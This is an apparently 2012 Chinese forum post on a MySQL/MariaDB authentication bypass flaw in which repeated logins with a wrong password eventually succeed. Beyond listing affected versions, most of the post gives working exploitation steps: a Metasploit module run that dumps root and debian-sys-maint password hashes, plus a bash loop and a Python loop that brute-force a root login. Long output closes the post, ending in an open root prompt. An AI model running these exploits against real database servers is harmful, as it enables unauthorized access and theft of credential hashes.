我就不实名 發表於 2012-6-12 10:42:56

Mysql身份认证漏洞的分析以及利用

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 <br />也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出现。 <br />受影响的产品: <br />All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are <br />vulnerable. <br />MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. <br />MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not. <br />网上已经出了metasploit版本的相应利用工具 <br /><strong>利用方法如下</strong>: <br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode2"> <br />$ msfconsole <br />msf &gt; use auxiliary/scanner/mysql/mysql_authbypass_hashdump <br />msf auxiliary(mysql_authbypass_hashdump) &gt; set USERNAME root <br />msf auxiliary(mysql_authbypass_hashdump) &gt; set RHOSTS 127.0.0.1 <br />msf auxiliary(mysql_authbypass_hashdump) &gt; run <br />[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test <br />[*] 127.0.0.1:3306 Authentication bypass is 10% complete <br />[*] 127.0.0.1:3306 Authentication bypass is 20% complete <br />[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts <br />[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes... <br />[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D <br />[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D <br />[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D <br />[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D <br />[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89 <br />[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt <br />[*] Scanned 1 of 1 hosts (100% complete) <br />[*] Auxiliary module execution completed <br /></div><br />测试方法2: <br /><strong>$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2&gt;/dev/null; done</strong> <br /><strong>mysql&gt;</strong> <br />测试方法3: <br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode3"> <br />#!/usr/bin/python <br />import subprocess <br />while 1: <br />subprocess.Popen("mysql -u root mysql --password=blah", shell=True).wait() <br />如下: <br />relik@stronghold:~# python mysql_bypass.py <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />ERROR 1045 (28000): Access denied for user &lsquo;root&rsquo;@'localhost&rsquo; (using password: YES) <br />Reading table information for completion of table and column names <br />You can turn off this feature to get a quicker startup with -A <br />Welcome to the MySQL monitor. Commands end with ; or \g. <br />Your MySQL connection id is 24598 www.jb51.net <br />Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu) <br />Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved. <br />Oracle is a registered trademark of Oracle Corporation and/or its <br />affiliates. Other names may be trademarks of their respective <br />owners. <br />Type &lsquo;help;&rsquo; or &lsquo;\h&rsquo; for help. Type &lsquo;\c&rsquo; to clear the current input statement. <br />mysql&gt; <br /></div>
頁: [1]
查看完整版本: Mysql身份认证漏洞的分析以及利用